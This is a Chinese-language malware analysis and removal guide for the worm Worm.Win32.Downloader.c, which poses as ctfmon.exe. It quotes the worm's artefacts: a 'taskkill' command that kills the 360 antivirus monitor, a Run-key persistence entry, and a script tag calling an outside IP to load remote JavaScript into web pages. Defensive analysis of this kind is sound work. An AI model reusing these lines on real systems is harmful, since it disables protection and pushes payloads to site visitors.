Worm.Win32.Downloader.c（ctfmon.exe）分析解决
Worm.Win32.Downloader.c分析
前面我们介绍过阿达的
ctfmon.exe[样本]
http://www.newjian.net/
jisuanjibingdu/2007/1017/1353.html
下面看看ctfmon.exe的分析：
文件名称：ctfmon.exe
文件大小：45,056 字节
AV命名：Win32.HLLW.Rubbish (Dr.Web v4.44);
                    Worm.Win32.Downloader.c (kav 7.0.0.125)
加壳方式：N/A
编写语言：Microsoft Visual C++ 6.0
病毒类型：蠕虫
文件MD5：6ede432a957fbbba10e2284819fe8d6e
传播方式：网页漏洞
样本来源：剑盟    [病毒样本] ctfmon不新不旧，刚刚好！      
行为分析：
1.释放批处理：
%Systemroot%\system32\tmipo.bat (24 字节)
用记事本打开.可见 taskkill /im 360tray.exe
然后进程cmd启动conime.exe (好像是废话)。
2.修改注册表，添加开机启动项
注册表键： HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表值： svchost
类型: REG_SZ
值：        C:\Documents and Settings\Administrator\桌面\ctfmon.exe
注：值为ctfmon.exe的所在路径
3.激活批处理tmipo.bat终止360安全卫士实时监控程序
命令行 taskkill /im 360tray.exe
4.然.后svchost.exe启动wmiprvse.exe -Embedding
命令行：C:\WINDOWS\system32\wbem\wmiprvse.exe -Embedding
5.连接网络 218.75.91.248
6.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，插入一段JS代码：
<script language=javascript src=http://218.75.91.248/qq.js></script>
解决方法：
1、断开网络，使.用wsyscheck终止并删除伪ctfmon.exe
http://www.kingzoo.com/bbs/attachments/day_071018/20071018_253ef5f7d83854994eb71QyFzgbNwmw8.png
http://www.kingzoo.com/bbs/attachments/day_071018/20071018_1aae09c1294ec80c1d08DijHKgXo5coX.png
2、使.用wsyscheck删除ctfmon的开机启动项
http://www.kingzoo.com/bbs/attachments/day_071018/20071018_a018656e3c0da40eb557PKEBXCJPAKkM.png
3、使用iframekill清除被插入代码的网页